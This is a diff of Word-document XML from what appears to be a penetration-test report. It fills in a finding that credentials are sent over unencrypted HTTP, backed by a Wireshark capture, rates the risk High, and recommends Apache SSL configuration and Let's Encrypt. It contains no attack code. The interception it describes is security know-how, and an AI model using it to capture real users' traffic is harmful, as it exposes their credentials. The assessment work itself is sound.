+      <w:bookmarkStart w:id="12" w:name="_Toc71393724"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 2 - </w:t>
@@ -6360,7 +6499,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc71325110"/>
+            <w:bookmarkStart w:id="13" w:name="_Toc71393725"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6600,7 +6739,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="14" w:name="_Proof_of_Concept_1"/>
-            <w:bookmarkStart w:id="15" w:name="_Toc71325111"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71393726"/>
             <w:bookmarkEnd w:id="14"/>
             <w:r>
               <w:rPr>
@@ -6804,7 +6943,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc71325112"/>
+            <w:bookmarkStart w:id="16" w:name="_Toc71393727"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6927,7 +7066,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc71325113"/>
+            <w:bookmarkStart w:id="17" w:name="_Toc71393728"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7012,7 +7151,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc71325114"/>
+            <w:bookmarkStart w:id="18" w:name="_Toc71393729"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7087,7 +7226,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="19" w:name="_Toc71325115"/>
+            <w:bookmarkStart w:id="19" w:name="_Toc71393730"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7170,7 +7309,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="20" w:name="_Toc71325116"/>
+            <w:bookmarkStart w:id="20" w:name="_Toc71393731"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7245,27 +7384,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">$question = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>htmlentities</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>($_POST["question"])</w:t>
+              <w:t>$question = htmlentities($_POST["question"])</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7277,7 +7396,6 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71325117"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7296,6 +7414,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc71393732"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7345,7 +7464,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc71325118"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71393733"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7547,7 +7666,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc71325119"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71393734"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7634,7 +7753,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc71325120"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71393735"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7710,7 +7829,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc71325121"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71393736"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7816,7 +7935,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc71325122"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71393737"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7908,7 +8027,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="27" w:name="_Toc71325123"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71393738"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8039,7 +8158,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="28" w:name="_Toc71325124"/>
+            <w:bookmarkStart w:id="28" w:name="_Toc71393739"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8172,7 +8291,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc71325125"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc71393740"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -8223,11 +8342,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="30" w:name="_Toc71325126"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="30" w:name="_Toc71393741"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8259,9 +8379,35 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ensitive information like the username and password transported via HTTP are not encrypted so it is possible that an attacker intercepts the packet</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and read directly from it.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8281,11 +8427,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="31" w:name="_Toc71325127"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="31" w:name="_Toc71393742"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8319,7 +8466,67 @@
               <w:spacing w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025D43FD" wp14:editId="29A9A212">
+                  <wp:extent cx="3940175" cy="1805940"/>
+                  <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
+                  <wp:docPr id="11" name="Picture 11"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="11" name="Picture 11"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId12"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3940175" cy="1805940"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>This is a screenshot from Wireshark and we can see that the username and password are shown as plaintext at the bottom.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8339,11 +8546,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="32" w:name="_Toc71325128"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="32" w:name="_Toc71393743"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8375,26 +8583,108 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve">Negligible: An attacker could do </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>xyz</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve"> with this vulnerability</w:t>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Maj</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>or</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>If</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> an </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>attacker manage</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> to</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> intercept the packets and</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> get the credentials, all the</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> other</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> vulnerabilities </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>will be</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> more likely to exploited</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> hence at a higher risk</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8414,11 +8704,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="33" w:name="_Toc71325129"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="33" w:name="_Toc71393744"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8451,14 +8742,40 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Almost Certain: The possibility of the vulnerability being exploited</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Possible</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>It</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> is possible for a skilled attacker to intercept the packets.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8478,11 +8795,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="34" w:name="_Toc71325130"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="34" w:name="_Toc71393745"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8522,7 +8840,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>Medium</w:t>
+              <w:t>High</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8531,7 +8849,24 @@
               <w:t xml:space="preserve">: </w:t>
             </w:r>
             <w:r>
-              <w:t>This is the reasoning behind my rating</w:t>
+              <w:t xml:space="preserve">Referring to the risk matrix in </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Appendix_I_-" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>, possible likelihood and major impact suggest a high risk.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>The use of HTTP could be one of the first causes of why other vulnerabilities can be exploited since they all require the attacker to login first. Moreover, it is important for a company dealing with banks to use HTTPS for all of their systems to inspire trusts from their clients.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8551,11 +8886,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="35" w:name="_Toc71325131"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="35" w:name="_Toc71393746"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8588,15 +8924,84 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>http://example.com</w:t>
-            </w:r>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">[1] </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId13" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:bCs/>
+                </w:rPr>
+                <w:t>https://httpd.apache.org/docs/2.4/ssl/ssl_howto.html</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2] </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId14" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:bCs/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>https://letsencrypt.org/getting-started/</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -8615,11 +9020,12 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="36" w:name="_Toc71325132"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="36" w:name="_Toc71393747"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8651,9 +9057,381 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>The fix goes here</w:t>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>L</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">imit to the time and budget, the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SSL configuration will need to contain, at minimum, the following directives</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> [1]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>LoadModule ssl_module modules/mod_ssl.so</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Listen 443</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;VirtualHost *:443&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ServerName www.example.com</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    SSLEngine on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    SSLCertificateFile "/path/to/www.example.com.cert"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
